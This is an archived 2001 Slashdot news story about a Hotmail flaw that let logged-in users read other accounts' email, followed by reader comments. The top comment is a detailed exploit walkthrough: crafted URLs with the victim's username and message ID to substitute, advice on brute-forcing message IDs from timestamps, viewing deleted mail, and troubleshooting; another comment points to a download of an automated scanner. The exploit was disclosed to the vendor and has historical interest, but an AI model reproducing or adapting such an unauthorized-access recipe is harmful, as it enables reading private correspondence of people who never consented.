Forgot your password?
typodupeerror
Microsoft

Hotmail Hacked 494

Posted by CmdrTaco
from the it-happened-again dept.
SyD writes " Apparently there is a major security hole on Hotmail that could allow crackers to read your e-mail. A hacking group known as root core discovered the hole and reported it to Microsoft. " This isn't the first time that the folks who are gonna give us a internet wide universal login system had a hole. The funny part is that I posted a story almost exactly like this like 2 years ago, and about once a week, someone emails me and says "I think my boyfriend/girlfriend is cheating on me and I really need to know the backdoor into hotmail to find out". No I'm not kidding. You can't make that stuff up.
This discussion has been archived. No new comments can be posted.

Hotmail Hacked

Comments Filter:
  • by gol64738 (225528) <[ ] ['' in gap]> on Monday August 20, 2001 @06:35PM (#2199821)
    ---=[ Three Steps To View Someones Emails In Hotmail (rev.2) ]=---

    (Tested with Internet Explorer 5)

    To view full email from some elses account do the following:

    1. Login normally to Hotmail with your ID (any id)

    2. Use this type of link to view specific message from specific user:

    http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_ lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e 22%26start%3d1%26len%3d9999999999999999%26raw%3d0% 26login%3dusername%26domain%3dhotmail%2ecom&hm___f l=attrd&domain=hotmail.com
    or
    http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd ?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2 fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250% 2e22%26start%3d1%26len%3d9999999999999999%26raw%3d 0%26login%3dusername%26domain%3dhotmail%2ecom&hm__ _fl=attrd&domain=hotmail.com

    From that link change values:
    MSG943322803%2e16 (Message id number, its simply a counter. %2e is escaped code for ".")
    username (Hotmail account name to view)

    MSG number examples: MSG943322803%2e1 , MSG943322803%2e22 , MSG943322803%2e149

    (remove "%26raw%3d0" if you want to view email as 'emailbox view', instead of full raw view.)
    (remove "&hm___fl=attrd&domain=hotmail.com" if you dont like the hotmail frame on top.)

    Note.You need to have both numbers correct
    and that username must have the message to make this link work.

    Note.All those "%2e" etc. are hexadecimal ascii codes. You need to use them instead of true characters.
    See here for full list: http://www.december.com/html/spec/ascii.html

    3. Done. If you entered correct message number & that user has it you will see it. :)
    (Test it with your own other hotmail account messages first to get the idea working.)

    ---=[ ideas and comments for improved viewing / scan ]=---

    Now typing those message numbers manually is too much
    work, you could create a small utility to automatically
    scan given range of messages from specific user name.
    (You need to build it to work with IE, as you must be
    logged in hotmail when you want to view messages..)

    It also helps to know that from the message numbers,
    in you own hotmail inbox,you can see about what time
    is what message number been used. eg:

    MSG998289581.0 arrived on 20.08.2001
    MSG997936971.27 arrived on 16.08.2001.
    MSG996698372.27 arrived on 01.08.2001.
    MSG975960863.0 arrived on 04.12.2000.

    So you dont need to scan as many message addresses
    when you know from which range you are looking at.

    Test messages: (Login to hotmail,then use links to view message from my test account)

    raw format view: (can copy base64 encoded files too:)
    http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd ?_ lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e 22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d 64%2e4%2e36%2e68_d1577%26login%3djokutesti99%26dom ain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.c om

    email box view: (can see any attached images directly etc.:)
    http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd ?_ lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e 22%26start%3d9702%26len%3d9687%26disk%3d64%2e4%2e3 6%2e68_d1577%26login%3djokutesti99%26domain%3dhotm ail%2ecom&hm___fl=attrd&domain=hotmail.com

    *Side note on deleting messages in Hotmail:
    -You can also see the message even if its deleted!
    If you delete a message in hotmail, and
    also empty trashcan, the message is still
    viewable using this type of link.
    Atleast for 6-12hrs or something.

    ---=[.... Status / Feedback / Fixes / Questions .....]---

    Changes on the link:

    Remove parameter:
    %26disk%3d64%2e4%2e36%2e68_d1577
    It caused Hotmail error page in some cases:
    "Due to an internal error your request cannot be processed.
    We apologize for the inconvenience. Please try again later."
    Solution:
    Remove that parameter from the link. its not required.

    Changed parameters:
    %26start%3d9702%26len%3d9687
    in to:
    %26start%3d1%26len%3d9999999999999999

    Thats is just the start & length to display, of the email.
    If you put too small value for len it should display
    only up to that amount of characters(?).

    *
    If the user doesnt have the message you will get error:
    "
    Subject: Unable to locate message
    Content-Type: text/plain; charset=us-ascii
    An error has prevented from locating the message."

    *
    Questions:
    Q1. How do i get to know which message number the user has?

    A1. You cannot. You just have to guess them..one by one.
    Yes, it could mean scanning thousands/millions of
    messages just to see something. (slow it is)

    Q2. I've sended a test message to my another account but cannot see it?
    And i can still see your test messages, but not my own?

    A2. Check again that your MSG number is correct, both X and Y. (MSGXXXXXXXXX.YYY)
    The Y value can be between 0-nnn. (i havent seen bigger than 150)
    Check that the link is correct.
    Check that you are logged in to Hotmail.
    Also try change the server, from "pv2fd.pav2.hotmail" to "lw14fd.law14.hotmail"
    If you can see the test account messages then hotmail hasnt been fixed yet.

    Q3. The hobo scanner program doesnt work?
    I get some "Path not found (76)" error?

    A3. True in most cases.. :)
    It has more bugs than microsoft products i guess.
    Its confirmed that it works atleast on win95. (latest version is hobo rev.2)
    On Winnt it works but it doesnt save the scans..(bug in activating the webwindow..)
    Create the output directory yourself, that fixes the path error.

    Q4. Where/How can i find this exploit link myself?

    A4. 1. Go to your hotmail preferences page.
    2. Go to Mail Display Settings.
    3. Set option 'Message Headers' to 'Advanced'.
    4. Press ok to save settings.
    5. View some email, you will see full message header.
    6. Click 'View E-mail Message Source'.
    7. Done. It opens new window with this exploitable link,
    you can remove the some useless parameters from the
    link and send this link to a friend for testing
    if can see your message.

    *
    No any reply or confirmation from Hotmail so far.
    The exploit still works. already almost 3 days since
    reported it to Hotmail..(today is 20.08.2001)

    Automated reply from hotmail security problem
    submission page did gave this type of message..:p

    "...Hotmail is a secure site and uses an intrusion alert that allows only one IP
    address to gain access to a mailbox at a time. If anyone tries to access your
    e-mail when your account is open, he or she is returned to the sign-in page.
    Hotmail uses state-of-the-art software and firewall protection to offer our
    members the highest security...."

  • by Imperator (17614) <slashdot2@NoSPAM.omershenker.net> on Monday August 20, 2001 @06:37PM (#2199838)
    You need to guess the message ID, a longish string based on a timestamp and another number. And once you do that, you still can't read other messages from that account unless you guess them separately. You could try brute-forcing the message IDs, of course, but then you're relying on a fast connection (I believe there are 60 possible message IDs per second, and you rarely know exactly when a message was processed anyway) and fast servers. Besides, after all this, you'll probably find that all the target account's real mail was automatically deleted to make room for WinXP.iso.bat, attached to a message asking for advice.
  • Go with Yahoo! Mail. (Score:2, Informative)

    by boinger (4618) <boinger AT fuck-you DOT org> on Monday August 20, 2001 @06:41PM (#2199861) Homepage
    Yahoo! Mail [slashdot.org] has never had such a flaw exposed, has it?

    And Yahoo! Messenger kicks AIM's and MSN Messenger's asses.

    Why tempt fate?

  • by tre (172905) on Monday August 20, 2001 @06:43PM (#2199874) Homepage
    blah blah, we expect this from MS... blah blah, when will they get their act together...

    This was already posted to BugTraq [securityfocus.com] not too long ago. For a more technical breakdown of the details surrounding the Hotmail vulnerability, go here:

    http://www.securityfocus.com/archive/1/205785 [securityfocus.com]
  • by Anonymous Coward on Monday August 20, 2001 @06:48PM (#2199904)
    Finding a valid message number is of course total guesswork, but they do all follow a consistent format and always have the same number of digits (i.e., a time stamp), so with the help of a little brute-force program one could (if one was into these things) try numerous combinations in the background rather than type them in.

    So the hacking danger here is very much limited by the need to guess message numbers, which is slow going. And while there is a handy program for bruting the numbers it's quite slow, trying only about one message page per second in 'fast' mode.

    Theres a little story about it on the msn.co.uk [msn.co.uk] website

  • by dudle (93939) on Monday August 20, 2001 @08:16PM (#2200254) Homepage
    I just can't believe you quote an entire email and don't give credit to the author. That's just plain wrong.

    My guess is you are a karma whore, nothing more. Now I may be wrong, you might be the actual author. In this case, let us know.

    /. sucks. FYI, the original foundings where from

    Research by wAwAsAn4
    wAwAsAn4@root-core.com
    Web: www.root-core.com [root-core.com]
    Email: [Digital-Vortex]@securityfocus.com [mailto]

    Voila.

  • by Lizard_King (149713) on Monday August 20, 2001 @09:19PM (#2200466) Journal
    you can download the hobo4 program, written by the folks at Root Core to automate this vulnerability here [64.23.55.50]. Warning about the code however:

    a) it's in VB

    b) you'll see methods like this:

    Public Sub ii(MSG As String)

    l_info.Caption = ">" & MSG

    End Sub

    are there no coding standards even among hacks?
  • Re:Again? (Score:2, Informative)

    by jawad (15611) on Monday August 20, 2001 @10:46PM (#2200687)
    What's with the trend of moderators who agree with people who totally miss the point?

    Saying something stupid, predicting you'd get modded down has been done since the beginning of moderation.
  • by grammar fascist (239789) on Tuesday August 21, 2001 @01:49AM (#2201073) Homepage
    Not to squash your witty reply or anything - but all cryptography relies on computational infeasibility. Let's say that Microsoft added a truly random 128-bit key to your email number. That would certainly raise the bar high enough, don't you think?

Your fault -- core dumped

Working...